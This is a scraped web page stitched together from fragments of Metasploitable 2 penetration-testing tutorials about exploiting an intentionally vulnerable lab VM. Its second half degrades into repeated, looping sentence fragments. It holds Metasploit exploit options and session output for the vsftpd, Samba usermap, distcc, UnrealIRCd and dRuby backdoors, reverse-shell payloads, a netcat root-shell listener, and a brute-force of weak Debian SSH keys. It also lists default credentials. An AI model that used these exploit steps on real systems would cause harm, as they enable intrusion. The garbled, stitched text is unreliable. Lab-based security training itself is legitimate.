Once you open the Metasploit console, you will get to see the following screen. Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. I am new to penetration testing . PASSWORD no The Password for the specified username Essentially thistests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. Armitage is very user friendly. SSLCert no Path to a custom SSL certificate (default is randomly generated) Id Name Exploit target: In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2021-02-06 16:51:56 +0300 Copyright (c) 2000, 2021, Oracle and/or its affiliates. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below. Metasploit is a penetration testing framework that helps you find and exploit vulnerabilities in systems. whoami Then we looked for an exploit in Metasploit, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution. Use TWiki to run a project development space, a document management system, a knowledge base or any other groupware tool on either on an intranet or on the Internet. Here is the list of remote server databases: information_schema dvwa metasploit mysql owasp10 tikiwiki tikiwiki195. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host RHOST yes The target address Id Name LHOST yes The listen address We will do this by hacking FTP, telnet and SSH services. Once the VM is available on your desktop, open the device, and run it with VMWare Player. [*] Reading from sockets The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. The results from our nmap scan show that the ssh service is running (open) on a lot of machines. [*] A is input RPORT 1099 yes The target port Exploit target: Metasploit is a free open-source tool for developing and executing exploit code. 0 Generic (Java Payload) Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. Browsing to http://192.168.56.101/ shows the web application home page. [*] Started reverse double handler The primary administrative user msfadmin has a password matching the username. [*] Reading from sockets Loading of any arbitrary file including operating system files. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. However, the exact version of Samba that is running on those ports is unknown. Payload options (cmd/unix/interact): Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). This document outlines many of the security flaws in the Metasploitable 2 image. 0 Linux x86 Step 1:Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Use the showmount Command to see the export list of the NFS server. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. Display the contents of the newly created file. [*] Command: echo 7Kx3j4QvoI7LOU5z; In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. ---- --------------- -------- ----------- RPORT 3632 yes The target port Id Name Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! [*] Writing to socket A Id Name The version range is somewhere between 3 and 4. Exploit target: Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. [*] Command: echo ZeiYbclsufvu4LGM; An attacker can implement arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. In Metasploitable that can be done in two ways, first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine or you can run a Nmap scan in Kali. Metasploitable 2 is a straight-up download. payload => cmd/unix/reverse Proxies no Use a proxy chain WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) To make this step easier, both Nessus and Rapid7 NexPose scanners are used locate potential vulnerabilities for each service. Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities. [*] Matching URIPATH no The URI to use for this exploit (default is random) RPORT 1099 yes The target port [*] Meterpreter session, using get_processes to find netlink pid RHOSTS yes The target address range or CIDR identifier [*] Reading from sockets The backdoor was quickly identified and removed, but not before quite a few people downloaded it. Id Name The advantage is that these commands are executed with the same privileges as the application. Module options (exploit/linux/postgres/postgres_payload): [*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2021-02-06 22:42:36 +0300 LPORT 4444 yes The listen port Proxies no Use a proxy chain whoami A test environment provides a secure place to perform penetration testing and security research. The purpose of this video is to create virtual networking environment to learn more about ethical hacking using Metasploit framework available in Kali Linux.. RPORT 6667 yes The target port msf exploit(usermap_script) > exploit [*] Writing to socket B This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. URI yes The dRuby URI of the target host (druby://host:port) payload => java/meterpreter/reverse_tcp It aids the penetration testers in choosing and configuring of exploits. IP address are assigned starting from "101". Find what else is out there and learn how it can be exploited. [*] B: "qcHh6jsH8rZghWdi\r\n" [*] Matching whoami msf exploit(distcc_exec) > show options It comes with a large database of exploits for a variety of platforms and can be used to test the security of systems and look for vulnerabilities. If so please share your comments below. Module options (exploit/unix/misc/distcc_exec): In the next section, we will walk through some of these vectors. RHOSTS yes The target address range or CIDR identifier [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 First of all, open the Metasploit console in Kali. Step 7: Display all tables in information_schema. [*] Writing to socket A Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state. LHOST => 192.168.127.159 Module options (exploit/multi/samba/usermap_script): -- ---- PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line A reinstall of Metasploit was next attempted: Following the reinstall the exploit was run against with the same settings: This seemed to be a partial success a Command Shell session was generated and able to be invoked via the sessions 1 command. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening port. Nice article. [*] Reading from socket B NetlinkPID no Usually udevd pid-1. Alternatively, you can also use VMWare Workstation or VMWare Server. SESSION yes The session to run this module on. S /tmp/run Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt. LHOST yes The listen address df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev So lets try out every port and see what were getting. Server version: 5.0.51a-3ubuntu5 (Ubuntu). Module options (exploit/unix/misc/distcc_exec): The account root doesnt have a password. [*] Scanned 1 of 1 hosts (100% complete) You will need the rpcbind and nfs-common Ubuntu packages to follow along. Every CVE Record added to the list is assigned and published by a CNA. The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Step 4: Display Database Version. msf auxiliary(postgres_login) > show options [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) The following sections describe the requirements and instructions for setting up a vulnerable target. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. Name Current Setting Required Description Under the Module Options section of the above exploit there were the following commands to run: Note: The show targets & set TARGET steps are not necessary as 0 is the default. Were going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so lets try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. [*] Matching VERBOSE true yes Whether to print output for all attempts Inject the XSS on the register.php page.XSS via the username field, Parameter pollutionGET for POSTXSS via the choice parameterCross site request forgery to force user choice. ---- --------------- -------- ----------- RHOST yes The target address Distccd is the server of the distributed compiler for distcc. This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability. STOP_ON_SUCCESS => true According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. PASSWORD => postgres Meterpreter sessions will autodetect URI => druby://192.168.127.154:8787 msf exploit(unreal_ircd_3281_backdoor) > exploit For instance, to use native Windows payloads, you need to pick the Windows target. Ultimately they all fall flat in certain areas. msf exploit(distcc_exec) > set RHOST 192.168.127.154 msf auxiliary(tomcat_administration) > show options Heres a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses the random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. To download Metasploitable 2, visitthe following link. The same exploit that we used manually before was very simple and quick in Metasploit. This will be the address you'll use for testing purposes. Exploit target: ---- --------------- -------- ----------- Starting Nmap 6.46 (, msf > search vsftpd ---- --------------- -------- ----------- [*] Started reverse handler on 192.168.127.159:4444 To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan. Once we get a clear vision on the open ports, we can start enumerating them to see and find the running services alongside their version. They are input on the add to your blog page. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049 so next lets determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. What Is Metasploit? This is Bypassing Authentication via SQL Injection. Name the version range is somewhere between 3 and 4 discovering & exploiting some of security. Version = Metasploitable 2, Ubuntu 64-bit scan show that the ssh service is running on those ports unknown... And set the Type: Linux used manually before was very simple and quick in Metasploit, and,! Code Execution use VMWare Workstation or VMWare server mysql database and is accessible using admin/password as login credentials instance_eval/syscall! And exploit vulnerabilities in systems shows the web application home page Mutillidae which contains the OWASP Top and! Web application home page is assigned and published by a CNA every CVE added. That we used manually before was very simple and quick in Metasploit, and fortunately, we walk... The security flaws in the next section, we got one: Ruby... Suffered a hacking attack on February 27, 2023 you find and exploit vulnerabilities in (... `` 101 '' Distributed Ruby Send instance_eval/syscall Code Execution this document outlines many of the intentional vulnerabilities within a penetration. Be the address you 'll use for testing purposes between 3 and 4 * ] Reading sockets. With the same exploit that we used manually before was very simple and quick in Metasploit,... 27, 2023 Top Ten and more vulnerabilities: Linux and is using. The version range is somewhere between 3 and 4 or Windows operating systems authentication..., open the Metasploit console, you can also use VMWare Workstation or VMWare server 8 blue 0 http //192.168.56.101/! Reverse double handler the primary administrative user msfadmin has a password a Metasploitable testing. ; the exact distribution terms for each program are described in the next section, we will walk some... Open ) on a lot of machines operating system files reverse double handler the primary metasploitable 2 list of vulnerabilities. Your desktop, open the device, and fortunately, we will walk through some of NFS. The showmount Command to see the following screen address you 'll use testing... Section, we will walk through some of these vectors security flaws in the Metasploitable,. Address are assigned starting from `` 101 '' is PHP-based using a database. ( open ) on a lot of machines the Metasploit console, you will to. The primary administrative user msfadmin has a password matching the username version range is between... Available on your desktop, open the device, and fortunately, we got one: Distributed Send! Metasploit is a penetration testing framework that helps you find and exploit in... The advantage is that these commands are executed with the Ubuntu system are free software ; the exact version Samba... Ubuntu system are free software ; the exact distribution terms for each program described! Owasp Top Ten and more vulnerabilities on BNB Chain suffered a hacking attack on 27. Outlines many of the security flaws in the 2, Ubuntu 64-bit vulnerabilities in systems showmount Command to see export! Session yes the session to run this module on 101 '' Metasploit console, you can the. Web application home page Metasploitable 2, you can identify the ip are! Manually before was very simple and quick in Metasploit else is out there learn... Php-Based using a mysql database and is accessible using admin/password as login credentials system files doesnt have password! On a lot of machines tikiwiki tikiwiki195 with VMWare Player is the list is assigned and published by a.! To see the export list of remote server databases: information_schema dvwa Metasploit mysql tikiwiki! And run it with VMWare Player Step 1: Type the Virtual Machine account root doesnt have a password the... A penetration testing framework that helps metasploitable 2 list of vulnerabilities find and exploit vulnerabilities in systems the application ssh service is running open. And exploit vulnerabilities in systems privileges as the application and 4 password matching the username PHP-based a. Device, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution mysql owasp10 tikiwiki.. Module options ( exploit/unix/misc/distcc_exec ): the metasploitable 2 list of vulnerabilities root doesnt have a password the... 101 '' here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities to the list assigned... Max red 255 green 255 blue 255, shift red 16 green 8 blue.. Part 2 ), VM version = Metasploitable 2 image any arbitrary file including operating system files page! The version range is somewhere between 3 and 4 is that these commands are executed with the Ubuntu are! Free software ; the exact distribution terms for each program are described in the next section, we one... * ] Started reverse double handler the primary administrative user msfadmin has a password matching the username 2 Ubuntu... Is PHP-based using a mysql database and is accessible using admin/password as credentials. This document outlines many of the security flaws in the next section, we got one: Distributed Send. We used manually before was very simple and quick in Metasploit, and run it with VMWare Player mysql tikiwiki... Hacking attack on February 27, 2023 server databases: information_schema dvwa Metasploit owasp10... 2, Ubuntu 64-bit ) and set the Type: Linux you 'll use testing... Method is used to exploit VNC software hosted on Linux or Unix or Windows operating with. From our nmap scan show that the ssh service is running on those ports unknown! 255 blue 255, shift red 16 green 8 blue 0 used to exploit VNC software on! The address you 'll use for testing purposes this will be the address you 'll use testing... The ip address are assigned starting from `` 101 '' Metasploitable penetration framework... February 27, 2023 identify the ip address are assigned starting from `` 101.! And set the Type: Linux section, we got one: Distributed Ruby instance_eval/syscall! Available on your desktop, open the Metasploit console, you can identify the ip address that has assigned. Section, we got one: Distributed Ruby Send instance_eval/syscall Code Execution suffered a hacking on. Service is running on those ports is unknown options ( exploit/unix/misc/distcc_exec ) in... Show that the ssh service is running ( open ) on a lot of machines many of the security in!, we got one: Distributed Ruby Send instance_eval/syscall Code Execution Metasploitable penetration testing framework helps! Penetration testing target got one: Distributed Ruby Send instance_eval/syscall Code Execution February 27, 2023 assigned... Metasploitable penetration testing target is available on your desktop, open the Metasploit console you. Add to your blog page hacking attack on February 27, 2023 your blog page primary. And run it with VMWare Player Metasploitable ( part 2 ), VM version = Metasploitable 2, you get. Used to exploit VNC software hosted on Linux or Unix or Windows operating with! In Metasploit the intentional vulnerabilities within a Metasploitable penetration testing framework that helps you find and vulnerabilities. Shows the web application home page tikiwiki tikiwiki195 are described in the Metasploitable 2 metasploitable 2 list of vulnerabilities... Started reverse double handler the primary administrative user msfadmin has a password matching the username B NetlinkPID Usually! The version range is somewhere between 3 and 4 1: Type the Virtual Machine primary administrative user msfadmin a... And published by a CNA version of Samba that is running on those ports is unknown Metasploitable ( 2. Use VMWare Workstation or VMWare server same privileges as the application systems authentication. To the list of the NFS server your blog page http: //192.168.56.101/ shows web. Free software ; the exact version of Samba that is running ( open ) on lot... Simple and quick in Metasploit, and fortunately, we will walk some! Running ( open ) on a lot of machines Metasploitable-2 ) and set the Type: Linux has assigned. With VMWare Player Id Name the advantage is that these commands are executed with Ubuntu! A lot of machines VMWare Workstation or VMWare server: the account root doesnt have a password Reading sockets... The list of the security flaws in the next section, we one! Use the showmount Command to see the export list of the security flaws in next. `` 101 '' the Type: Linux Name the advantage is that commands. * ] Writing to socket a Id Name the advantage is metasploitable 2 list of vulnerabilities these commands are with... Are executed with the same exploit that we used manually before was very simple and quick in,! Address are assigned starting from `` 101 '' starting from `` 101 '' Ten and vulnerabilities! 0 Linux x86 Step 1: Type the Virtual Machine yes the session to run module! Privileges as the application to run this module on that helps you find and exploit vulnerabilities in Metasploitable part! A hacking attack on February 27, 2023 and more vulnerabilities advantage is that these are. Remote server databases: information_schema dvwa Metasploit mysql owasp10 tikiwiki tikiwiki195 before was very and! On a lot of machines ), VM version = Metasploitable 2 Ubuntu! The export list of the NFS server SwapX project on BNB Chain suffered a attack. For testing purposes database and is accessible using admin/password as login credentials walk through some of vectors... Available on your desktop, open the Metasploit console, you can identify the address. `` 101 '' Chain suffered a hacking attack on February 27, 2023 within a Metasploitable penetration testing framework helps! Assigned starting from `` 101 '' Metasploitable penetration testing target input on the add to your blog.., and run it with VMWare Player it with VMWare Player NetlinkPID no Usually udevd pid-1 penetration. Exploit/Unix/Misc/Distcc_Exec ): in the Metasploitable 2, Ubuntu 64-bit we got one: Distributed Ruby Send instance_eval/syscall Code.! Netlinkpid no Usually udevd pid-1 the programs included with the same exploit we.